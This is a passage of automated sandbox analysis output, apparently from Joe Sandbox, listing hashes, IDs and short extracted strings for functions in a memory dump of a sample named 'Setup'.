                                                                                                                        • Instruction ID: e69c1bdce22b4f63098e3fc8c3130d2363231ea4248f86816ab56b6592338fb9
                                                                                                                        • Opcode Fuzzy Hash: ca685cd46ad8921f7597725b7c27d83404727ea77bb20cc563adbfb3b151aa4b
                                                                                                                        • Instruction Fuzzy Hash: E6C1237164C3908FD314CF6594D026FBBE2ABD2708F284A2DE5D54B391D7768A0ACB93
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: =4;*$@[LC$^_OS$qwk
                                                                                                                        • API String ID: 0-509714745
                                                                                                                        • Opcode ID: ae95850d1f9beaa7cab60da507b2fc588712110bbb2af5fc5f3a5700586748e0
                                                                                                                        • Instruction ID: a139815b8a130dc5551c18f94875bd1480f91c99047cb9fe715d5cc4d595a345
                                                                                                                        • Opcode Fuzzy Hash: ae95850d1f9beaa7cab60da507b2fc588712110bbb2af5fc5f3a5700586748e0
                                                                                                                        • Instruction Fuzzy Hash: EC22CE742057818FD725CF29C4D0662BBE2FF96300B28869DC8D68FB96D739E946CB50
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: x$*y$D$yr
                                                                                                                        • API String ID: 0-3058411324
                                                                                                                        • Opcode ID: e3165ff493bcfc53e921b774f969eec0306ea0b3abe8ba6652f4ebe74cf20904
                                                                                                                        • Instruction ID: 103a89eee9e097d583958e8d24acb376a80d8aa28c2b3a81343dde39643d4046
                                                                                                                        • Opcode Fuzzy Hash: e3165ff493bcfc53e921b774f969eec0306ea0b3abe8ba6652f4ebe74cf20904
                                                                                                                        • Instruction Fuzzy Hash: 45A1BFB1509390CBE3288F54C4657ABBBF1FF82354F0A8A5CD4D56B291E3788A44CB96
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "BCD$TP$WX$Xstu
                                                                                                                        • API String ID: 0-826843603
                                                                                                                        • Opcode ID: b7fdb470a33314f6d4297e7063fdf6e8368b6594f58d73747934d8d68845dd05
                                                                                                                        • Instruction ID: 2562cbe7157ec81f364bd5a19cce85c88f9c3f76288956939a376127bc583c8c
                                                                                                                        • Opcode Fuzzy Hash: b7fdb470a33314f6d4297e7063fdf6e8368b6594f58d73747934d8d68845dd05
                                                                                                                        • Instruction Fuzzy Hash: AF51DEB59083118BD710CF24C85222BBBF1FF96704F54982CE9D5AB391E339CA06DB5A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: eb`|$xzy|$xzy|$ztrz
                                                                                                                        • API String ID: 0-2346729475
                                                                                                                        • Opcode ID: cb5a037dfb8ed190ede9148edda118d26c08066c8de1145a06f7ecdb54039dc7
                                                                                                                        • Instruction ID: ab6cf9d45d53db0f14e7bc8a8c21b5e357edde39f4ae745a4c37ef55998b96cb
                                                                                                                        • Opcode Fuzzy Hash: cb5a037dfb8ed190ede9148edda118d26c08066c8de1145a06f7ecdb54039dc7
                                                                                                                        • Instruction Fuzzy Hash: 1E517D72D04276CFCB14CF64C4802EABBB5FF59340B298569D8A59B345D734EA4ACBE0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: D+,-$H?E!$N3x5$O'G)
                                                                                                                        • API String ID: 0-597650740
                                                                                                                        • Opcode ID: 31b068d1ab63c86698f6cfa1c5cbce945b20e7cc8e4fd355a24e81b787d51579
                                                                                                                        • Instruction ID: 81ec145c99811664378a51185d5e4d2814a181ed5560dce83a53db75fc48975d
                                                                                                                        • Opcode Fuzzy Hash: 31b068d1ab63c86698f6cfa1c5cbce945b20e7cc8e4fd355a24e81b787d51579
                                                                                                                        • Instruction Fuzzy Hash: CA310F71A483408BD3349F18C8827ABB3B5EF87324F048A1CE8D58B3D4EB348940DB96
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: HI$AC$EG
                                                                                                                        • API String ID: 0-510928359
                                                                                                                        • Opcode ID: 7c17e3b7b10553e4d258fe94ea2b9ae111ce6d35ee97d525ebc509b79caa9a54
                                                                                                                        • Instruction ID: 08761feb5145fb7b2be2eb2eaaaf67ad314ecc0969f3441826f8b45ef37113aa
                                                                                                                        • Opcode Fuzzy Hash: 7c17e3b7b10553e4d258fe94ea2b9ae111ce6d35ee97d525ebc509b79caa9a54
                                                                                                                        • Instruction Fuzzy Hash: 8F0200716083118BC710DF68C88236BB7E1EFD6364F088A5CE8D68B394E778D645E796
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: H%C'$f!K#$p-./
                                                                                                                        • API String ID: 0-2974429307
                                                                                                                        • Opcode ID: 49c818c5792c626cffebaac9169d254a12df7fb4022357f8a0d5a937eeb2ed43
                                                                                                                        • Instruction ID: ef2e312cbbb14f8dfa22c9354bced185daf05903700e498ee058a2f74d0caa07
                                                                                                                        • Opcode Fuzzy Hash: 49c818c5792c626cffebaac9169d254a12df7fb4022357f8a0d5a937eeb2ed43
                                                                                                                        • Instruction Fuzzy Hash: 07F101716083128BD3149F29C89176BF7E2FFCA744F09896DE8CA9B390E7348A05D756
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ;\$p$pbUq
                                                                                                                        • API String ID: 0-2362925771
                                                                                                                        • Opcode ID: 69e25b920ca7ccdad5ef3b7033a7bdba34408d9de553430339bf444beb0ec28f
                                                                                                                        • Instruction ID: 9c51b1a26d5c2ede6504cf369d2bcf1872e395a7555aea08c74323fe17708aab
                                                                                                                        • Opcode Fuzzy Hash: 69e25b920ca7ccdad5ef3b7033a7bdba34408d9de553430339bf444beb0ec28f
                                                                                                                        • Instruction Fuzzy Hash: 16E1277160C3A18ED7258F28C4407ABBFD1AF97344F18496DD4D9AB282DB78950AC753
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: |{$}r
                                                                                                                        • API String ID: 0-3788219015
                                                                                                                        • Opcode ID: 4899ac2b2a4394e4f8f2f8cb882d730f63f9d59d5926909ca3f4fd15655cb395
                                                                                                                        • Instruction ID: 45c6ceaad6ad28cd0ea4d7b39f71f2cd1ab82940429067e219949ec95f23b32f
                                                                                                                        • Opcode Fuzzy Hash: 4899ac2b2a4394e4f8f2f8cb882d730f63f9d59d5926909ca3f4fd15655cb395
                                                                                                                        • Instruction Fuzzy Hash: 4BA202756483009BD314DF65CC81B2EBBA2FBC6308F28896CEAC497261DB71DD41EB42
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0$8
                                                                                                                        • API String ID: 0-46163386
                                                                                                                        • Opcode ID: 333321d7748d681832f8b49f08b2c4246fc55238b8a52f0827d1574feaaed049
                                                                                                                        • Instruction ID: 91263b478c42db59b1847b704fe3b372943f94ce210e0ac5fd3c82a199117e8a
                                                                                                                        • Opcode Fuzzy Hash: 333321d7748d681832f8b49f08b2c4246fc55238b8a52f0827d1574feaaed049
                                                                                                                        • Instruction Fuzzy Hash: 907234715083419FD714CF18C880BABBBE5BF88318F14892DF99987392D775DA68CB92
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 5$=8
                                                                                                                        • API String ID: 0-2602551699
                                                                                                                        • Opcode ID: d7227d8eff3940c635693acad4b6fe061a16741386ee5eb7f76f3a9d5cc053d2
                                                                                                                        • Instruction ID: d933a555b62bed72fc19d65491d03b428c2ed0d47f738c78db9607b1c9d33c69
                                                                                                                        • Opcode Fuzzy Hash: d7227d8eff3940c635693acad4b6fe061a16741386ee5eb7f76f3a9d5cc053d2
                                                                                                                        • Instruction Fuzzy Hash: BFC11472A4C3914BC325CF2984A075BFFE1AFD3254F19496DE4D49B382D3398906CBA6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: )$IEND
                                                                                                                        • API String ID: 0-707183367
                                                                                                                        • Opcode ID: e76bbe72449ff5e884c771fe50fcaf10b8fc205f23557bb031ab6c4f822b4f5d
                                                                                                                        • Instruction ID: 8d6df405694c049710b7095cdfbb7bd294e30fa169bde69846871af1e7c0a3f8
                                                                                                                        • Opcode Fuzzy Hash: e76bbe72449ff5e884c771fe50fcaf10b8fc205f23557bb031ab6c4f822b4f5d
                                                                                                                        • Instruction Fuzzy Hash: D3D19AB1A083449FE720CF15C884B5ABBE4BB94344F54492EF9999B3C1D779E908CF92
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: =4"9$LY
                                                                                                                        • API String ID: 0-2267171913
                                                                                                                        • Opcode ID: 5ae04df9b6937d105d322284a78b4caaed999501422c880082fa3973faf9e1b1
                                                                                                                        • Instruction ID: f5ad759cc7ac3bcd0e9e0dac599f90d3d78759ec8f90072e8365a7c66aa020f1
                                                                                                                        • Opcode Fuzzy Hash: 5ae04df9b6937d105d322284a78b4caaed999501422c880082fa3973faf9e1b1
                                                                                                                        • Instruction Fuzzy Hash: 4181E57464C3A08FE3358B2884603AFBBD0AF97314F598A5ED4D66B281DB754A09CB53
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: =4"9$LY
                                                                                                                        • API String ID: 0-2267171913
                                                                                                                        • Opcode ID: 3105e639c81f50ff3facdbcf950785caad11cae0f2cb6ecdf3354da5c6e0fc36
                                                                                                                        • Instruction ID: 0ca97812e7c2b4d0885d845acc83a44994dddd9d4c88981fd46e36075a97d56f
                                                                                                                        • Opcode Fuzzy Hash: 3105e639c81f50ff3facdbcf950785caad11cae0f2cb6ecdf3354da5c6e0fc36
                                                                                                                        • Instruction Fuzzy Hash: FA81E37464C3A08FE3358B2884603BFBBD1AF93314F598A5ED4D65B281DB794609CB53
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: =4"9$LY
                                                                                                                        • API String ID: 0-2267171913
                                                                                                                        • Opcode ID: ac818fe0cc85dc459c69c3b4a7a76587b51b978bc8c7615353fe3c4d09572a08
                                                                                                                        • Instruction ID: c0bd97599ca2720d11b45cc4f930298c5ad009ce6a15c5a10ea284d771b53a44
                                                                                                                        • Opcode Fuzzy Hash: ac818fe0cc85dc459c69c3b4a7a76587b51b978bc8c7615353fe3c4d09572a08
                                                                                                                        • Instruction Fuzzy Hash: 7471C17464C3E08FE3359B2884603ABBBD1AFD3305F594A4DD4D65B282DB75460ACB93
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 7$gfff
                                                                                                                        • API String ID: 0-3777064726
                                                                                                                        • Opcode ID: 54e96c052bd681a6fe24e27ff15cfe5ac0d6a831a98fada05bb4f7435a8e764c
                                                                                                                        • Instruction ID: 4b3c47eeecd4833a0098cf7e5b1fffeb659150026a678709400870946d817625
                                                                                                                        • Opcode Fuzzy Hash: 54e96c052bd681a6fe24e27ff15cfe5ac0d6a831a98fada05bb4f7435a8e764c
                                                                                                                        • Instruction Fuzzy Hash: 26613672A082118BE328CF29C81177AB7D2FFC6304F19867DE4D9DB295DB749901DB81
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: G$ps
                                                                                                                        • API String ID: 0-1075861082
                                                                                                                        • Opcode ID: 69bdc289806c250f564a258df5985de0a29e38e393431798a827ba1f20481965
                                                                                                                        • Instruction ID: 21acfa012a8bac2d3019bf376a29ab62111db14b56cd1b460efd24e3f674dea3
                                                                                                                        • Opcode Fuzzy Hash: 69bdc289806c250f564a258df5985de0a29e38e393431798a827ba1f20481965
                                                                                                                        • Instruction Fuzzy Hash: AD51D976A046218FCB29CF68D85125FB7F1FF45210F1AC52DC5AAEB785DB349842CB80
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: yxwv$yxwv
                                                                                                                        • API String ID: 0-2424606590
                                                                                                                        • Opcode ID: e133bcbbab52d2ccedfa6a24bdef54b97f9c4699a973f887d741725b78376bae
                                                                                                                        • Instruction ID: 308817b8da841a72fb5dd3164b6eb2efb55462014b9da0f3457c65ac6fdfbbd0
                                                                                                                        • Opcode Fuzzy Hash: e133bcbbab52d2ccedfa6a24bdef54b97f9c4699a973f887d741725b78376bae
                                                                                                                        • Instruction Fuzzy Hash: 9231F475B045198BDF19CF65E8902BF7363FBCA314B198939C892AB354CB349A428785
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: f
                                                                                                                        • API String ID: 0-1993550816
                                                                                                                        • Opcode ID: e28594ced7b9a1bd1992086f9c7c8c0f320ac66b7edf18504e574ce0dcac939e
                                                                                                                        • Instruction ID: a7c05ec1c7fa69a1f36951b042bd3aa146e00d7d014fb682eba835f76a564d2e
                                                                                                                        • Opcode Fuzzy Hash: e28594ced7b9a1bd1992086f9c7c8c0f320ac66b7edf18504e574ce0dcac939e
                                                                                                                        • Instruction Fuzzy Hash: 2222CF716083518FD715CF19C880B2EBBE1BBC9328F188E2DE59997292D775EE05CB42
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: EG
                                                                                                                        • API String ID: 0-644214010
                                                                                                                        • Opcode ID: b7ba958b9bd480cff21dad9864d63a469201ef975bf6248fe76e161b4adc0038
                                                                                                                        • Instruction ID: 41e7c05be7b602cdc1745bc096953084b3aab59158cf7502b58dd381e3fc20e0
                                                                                                                        • Opcode Fuzzy Hash: b7ba958b9bd480cff21dad9864d63a469201ef975bf6248fe76e161b4adc0038
                                                                                                                        • Instruction Fuzzy Hash: A8D14874A00321CBCB24CF68C89177AB7B1FF86324F28965CD8916F3A5E7349942CB90
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l1
                                                                                                                        • API String ID: 0-3645847150
                                                                                                                        • Opcode ID: 7dcb455234b5cb94c53c37a959a9ea8efbcce72ddedaa1bef5c3eaeeffae56e1
                                                                                                                        • Instruction ID: 06a89253cec551c098f807bd7dd9ddb4b273ffbee0c0a3f135e8cd8cadf263e0
                                                                                                                        • Opcode Fuzzy Hash: 7dcb455234b5cb94c53c37a959a9ea8efbcce72ddedaa1bef5c3eaeeffae56e1
                                                                                                                        • Instruction Fuzzy Hash: 04B113B16043619BDB24CF64CC9176BB3E5FFC4314F04896CE9858B281EB78E909CB52
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "
                                                                                                                        • API String ID: 0-123907689
                                                                                                                        • Opcode ID: b11f9fc3cfb977688e73512924150e2b33b0a37b4069adab8990f0727325115d
                                                                                                                        • Instruction ID: 5b720cc1591f7e5f887f752f846cc965925a316a8d23488cb03ddc9349e591a2
                                                                                                                        • Opcode Fuzzy Hash: b11f9fc3cfb977688e73512924150e2b33b0a37b4069adab8990f0727325115d
                                                                                                                        • Instruction Fuzzy Hash: 24C1E872A083255BD714DE25C49076AB7E6AFC5318F18892DE8D98B381DF34DE4CCB92
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "{
                                                                                                                        • API String ID: 0-566033515
                                                                                                                        • Opcode ID: a588dd6b5181f6f3dee479ee416c26cfa2b69e77d03f6be0f61b6f8b36dc1b10
                                                                                                                        • Instruction ID: f2b5e5447b49fa767f6e08bd3b083dbf6e5b9da991abec14239b8cce0f4cd5ea
                                                                                                                        • Opcode Fuzzy Hash: a588dd6b5181f6f3dee479ee416c26cfa2b69e77d03f6be0f61b6f8b36dc1b10
                                                                                                                        • Instruction Fuzzy Hash: B0A18F3164C3A18FD7248F28C8917AEBBD2EFD2300F198A2ED4D597381DB359609C792
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: HIJK
                                                                                                                        • API String ID: 0-3946259990
                                                                                                                        • Opcode ID: 4c90d331b8ebf5b99b25e4ee74ba3ccf7370c40627357b69b16095ca156ceacf
                                                                                                                        • Instruction ID: 24009a4ea1239257e4efa8674a1ce72c90fbb10cd72ccaf7f760f4459dfb8ff6
                                                                                                                        • Opcode Fuzzy Hash: 4c90d331b8ebf5b99b25e4ee74ba3ccf7370c40627357b69b16095ca156ceacf
                                                                                                                        • Instruction Fuzzy Hash: 51A15372A083148FD325DF58D8806ABB7A2FFD4300F19893CE99197251D7B9EE45CB81
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ,
                                                                                                                        • API String ID: 0-3772416878
                                                                                                                        • Opcode ID: 25ca1e513858b7c69e6d524a8f6e09e04a927aea598f131dfb8b0651f29a0af0
                                                                                                                        • Instruction ID: 6b48d2d8b1db09b9f5d31407e49994beb5d1c934c3c253cecdda9f9dc0fdb1fe
                                                                                                                        • Opcode Fuzzy Hash: 25ca1e513858b7c69e6d524a8f6e09e04a927aea598f131dfb8b0651f29a0af0
                                                                                                                        • Instruction Fuzzy Hash: 6AB14B711083819FC325CF58C89461BFBE0AFA9704F448E2DE5D997782D631EA18CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Fz
                                                                                                                        • API String ID: 0-1462395486
                                                                                                                        • Opcode ID: 706cbc971ec6e50c8a831aaa54fe331c5dca837f89748504c687b8f3682bb82e
                                                                                                                        • Instruction ID: a3004b5a269042df957273e3ff7e40dba1bb79c03d75d0b69c58a66cc676b7d1
                                                                                                                        • Opcode Fuzzy Hash: 706cbc971ec6e50c8a831aaa54fe331c5dca837f89748504c687b8f3682bb82e
                                                                                                                        • Instruction Fuzzy Hash: E75126B291426047CB249F24CC9267773F0EF95324F089A6DEC868B290F77CE609C751
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ~
                                                                                                                        • API String ID: 0-1707062198
                                                                                                                        • Opcode ID: 7082b30785db700d6bb603fa2c29ba673ded49e4817ebd93e1863b25fe500efc
                                                                                                                        • Instruction ID: 4e64dd6091c723063a7ed0ff9ec35ef3d659330b3a24c445e7c499e44e931487
                                                                                                                        • Opcode Fuzzy Hash: 7082b30785db700d6bb603fa2c29ba673ded49e4817ebd93e1863b25fe500efc
                                                                                                                        • Instruction Fuzzy Hash: 4D812972A042614FC722CE28885176ABBD1ABC6224F19C23DDCBADB3D1D734D945E7D1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "
                                                                                                                        • API String ID: 0-123907689
                                                                                                                        • Opcode ID: 90eee15b6ff8aa2e44d47e4b4810ade9978594ceed370e3aea143d44b0cd3bac
                                                                                                                        • Instruction ID: 2985491e53fbc97f3d4c47eaad221d6c7fd12713344d567148ba7ca8cd610313
                                                                                                                        • Opcode Fuzzy Hash: 90eee15b6ff8aa2e44d47e4b4810ade9978594ceed370e3aea143d44b0cd3bac
                                                                                                                        • Instruction Fuzzy Hash: 4381F432A087258BD724CE2DC88031EB7E2ABC5718F19D52DE4D48B395DB75DD4D8782
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: N
                                                                                                                        • API String ID: 0-1130791706
                                                                                                                        • Opcode ID: e6c6cb46c47ede4b466a339fd2795009d2a625b2e4600d5f67953f7600522c66
                                                                                                                        • Instruction ID: 1c218c889110aa99f0ad635fa51bc4f1486b3def18a320b715d4dd0c69fa335d
                                                                                                                        • Opcode Fuzzy Hash: e6c6cb46c47ede4b466a339fd2795009d2a625b2e4600d5f67953f7600522c66
                                                                                                                        • Instruction Fuzzy Hash: AF512832A093718FC324CA298CC01A7F793EFD5254F0E8669D9994B399DB399A0DC791
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
